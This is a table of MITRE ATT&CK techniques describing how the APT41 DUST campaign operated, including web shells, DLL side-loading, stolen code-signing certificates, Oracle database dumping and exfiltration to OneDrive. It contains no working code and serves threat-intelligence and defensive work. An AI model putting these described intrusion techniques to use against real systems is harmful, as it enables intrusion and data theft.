| enterprise |
T1583 |
Acquire Infrastructure |
- |
| enterprise |
T1583.007 |
Serverless |
APT41 DUST used infrastructure hosted behind Cloudflare or utilized Cloudflare Workers for command and control. |
| enterprise |
T1071 |
Application Layer Protocol |
- |
| enterprise |
T1071.001 |
Web Protocols |
APT41 DUST used HTTPS for command and control. |
| enterprise |
T1560 |
Archive Collected Data |
- |
| enterprise |
T1560.001 |
Archive via Utility |
APT41 DUST used rar to compress data downloaded from internal Oracle databases prior to exfiltration. |
| enterprise |
T1119 |
Automated Collection |
APT41 DUST used tools such as SQLULDR2 and PINEGROVE to gather local system and database information. |
| enterprise |
T1586 |
Compromise Accounts |
- |
| enterprise |
T1586.003 |
Cloud Accounts |
APT41 DUST used compromised Google Workspace accounts for command and control. |
| enterprise |
T1543 |
Create or Modify System Process |
- |
| enterprise |
T1543.003 |
Windows Service |
APT41 DUST used Windows Services with names such as Windows Defend for persistence of DUSTPAN. |
| enterprise |
T1213 |
Data from Information Repositories |
- |
| enterprise |
T1213.006 |
Databases |
APT41 DUST collected data from victim Oracle databases using SQLULDR2. |
| enterprise |
T1074 |
Data Staged |
- |
| enterprise |
T1074.001 |
Local Data Staging |
APT41 DUST involved exporting data from Oracle databases to local CSV files prior to exfiltration. |
| enterprise |
T1573 |
Encrypted Channel |
- |
| enterprise |
T1573.002 |
Asymmetric Cryptography |
APT41 DUST used HTTPS for command and control. |
| enterprise |
T1567 |
Exfiltration Over Web Service |
- |
| enterprise |
T1567.002 |
Exfiltration to Cloud Storage |
APT41 DUST exfiltrated collected information to OneDrive. |
| enterprise |
T1574 |
Hijack Execution Flow |
- |
| enterprise |
T1574.001 |
DLL |
APT41 DUST involved the use of DLL search order hijacking to execute DUSTTRAP. APT41 DUST used also DLL side-loading to execute DUSTTRAP via an AhnLab uninstaller. |
| enterprise |
T1070 |
Indicator Removal |
- |
| enterprise |
T1070.004 |
File Deletion |
APT41 DUST deleted various artifacts from victim systems following use. |
| enterprise |
T1105 |
Ingress Tool Transfer |
APT41 DUST involved execution of certutil.exe via web shell to download the DUSTPAN dropper. |
| enterprise |
T1036 |
Masquerading |
- |
| enterprise |
T1036.004 |
Masquerade Task or Service |
APT41 DUST disguised DUSTPAN as a legitimate Windows binary such as w3wp.exe or conn.exe. |
| enterprise |
T1027 |
Obfuscated Files or Information |
- |
| enterprise |
T1027.013 |
Encrypted/Encoded File |
APT41 DUST used encrypted payloads decrypted and executed in memory. |
| enterprise |
T1588 |
Obtain Capabilities |
- |
| enterprise |
T1588.003 |
Code Signing Certificates |
APT41 DUST used stolen code signing certificates to sign DUSTTRAP malware and components. |
| enterprise |
T1596 |
Search Open Technical Databases |
- |
| enterprise |
T1596.005 |
Scan Databases |
APT41 DUST used internet scan data for target development. |
| enterprise |
T1593 |
Search Open Websites/Domains |
- |
| enterprise |
T1593.002 |
Search Engines |
APT41 DUST involved use of search engines to research victim servers. |
| enterprise |
T1594 |
Search Victim-Owned Websites |
APT41 DUST involved access of external victim websites for target development. |
| enterprise |
T1505 |
Server Software Component |
- |
| enterprise |
T1505.003 |
Web Shell |
APT41 DUST involved use of web shells such as ANTSWORD and BLUEBEAM for persistence. |
| enterprise |
T1553 |
Subvert Trust Controls |
- |
| enterprise |
T1553.002 |
Code Signing |
APT41 DUST used stolen code signing certificates for DUSTTRAP malware and subsequent payloads. |
| enterprise |
T1569 |
System Services |
- |
| enterprise |
T1569.002 |
Service Execution |
APT41 DUST used Windows services to execute DUSTPAN. |
| enterprise |
T1102 |
Web Service |
APT41 DUST used compromised Google Workspace accounts for command and control. |